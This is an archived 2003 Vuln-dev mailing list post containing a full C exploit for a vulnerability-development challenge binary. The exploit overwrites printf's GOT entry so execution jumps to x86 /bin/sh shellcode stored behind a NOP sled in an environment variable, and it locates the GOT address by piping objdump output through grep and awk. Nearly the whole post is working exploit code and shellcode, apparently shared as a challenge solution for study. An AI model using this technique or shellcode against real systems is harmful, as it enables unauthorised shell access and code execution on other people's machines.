Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

[Vuln-dev Challenge] example exploit for 2

From: <ot () hushmail com>
Date: Sat, 24 May 2003 09:18:47 -0700


example exploit for vuln-dev challenge 2, requires the address
of the shellcode in the environment as an argument

/*
 * example exploit code for vuln-dev challenge 2
 *
 * we overwrite printf's got table entry to point to our
 * shellcode in the environment
 *
 * omicron tau - ot () hushmail com
 */

/*
 * objdump, grep, and awk need to be in your path
 *
 * tested on linux 2.4.20 using env address 0xbfffe2ac
 *
 * rm db.log first
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define VULNPATH        "./vdc2"                /* path to vulnerable
binary */

/* /bin/sh */
char shellcode[]=
    "\xeb\x21\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x89\x76\x0b\x8d"
    "\x5e\x08\x89\x5e\x0f\x89\x46\x13\xb0\x0b\x89\xf3\x8d\x4e\x0b"
    "\x8d\x56\x13\xcd\x80\xe8\xda\xff\xff\xff\x2f\x62\x69\x6e\x2f"
    "\x73\x68\x38\x2d\x69\x32\x33\x34\x35\x36\x37\x38\x39\x61\x62"
    "\x63\x64\x65";

unsigned int go;        /* GOT entry address for printf */

void
find_got_addr()
{
        FILE *p;
        char buf[1024];

        snprintf(buf, sizeof(buf), "objdump -R %s | grep ' printf' |
" \
            "awk '{ print \"0x\"$1 }'", VULNPATH);
        p = popen(buf, "r");
        fgets(buf, sizeof(buf), p);
        pclose(p);

        go = strtoul(buf, NULL, 0);
        go -= 2;        /* ;; */

        printf("[!] using got addr 0x%x\n", go);
}

int
main(int argc, char *argv[])
{
        char envbuf[8192];
        char obuf[129];
        char scbuf[5];
        unsigned int scaddr;
        int i;

        if (argc < 2) {
                fputs("vdc2x: usage: vdc2x scaddr\n", stderr);
                exit(1);
        }
        scaddr = strtoul(argv[1], NULL, 0);

        find_got_addr();

        memset(obuf, 0, sizeof(obuf));
        for (i = 0; i < sizeof(obuf) - 1; i+=4)
                memcpy(&obuf[i], &go, 4);
        obuf[sizeof(obuf) - 1] = 0;

        memset(envbuf, 0x90, sizeof(envbuf));
        memcpy(&envbuf[8000], shellcode, strlen(shellcode));
        envbuf[sizeof(envbuf) - 1] = 0;
        setenv("SC", envbuf, 1);

        memcpy(scbuf, &scaddr, 4);
        scbuf[4] = 0;
        execl(VULNPATH, "./vdc2", obuf, scbuf, NULL);

        return(0);
}




Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2

Free, ultra-private instant messaging with Hush Messenger
https://www.hushmail.com/services.php?subloc=messenger&l=434

Big $$$ to be made with the HushMail Affiliate Program: 
https://www.hushmail.com/about.php?subloc=affiliate&l=427
Previous By Date Next
Previous By Thread Next

Current thread: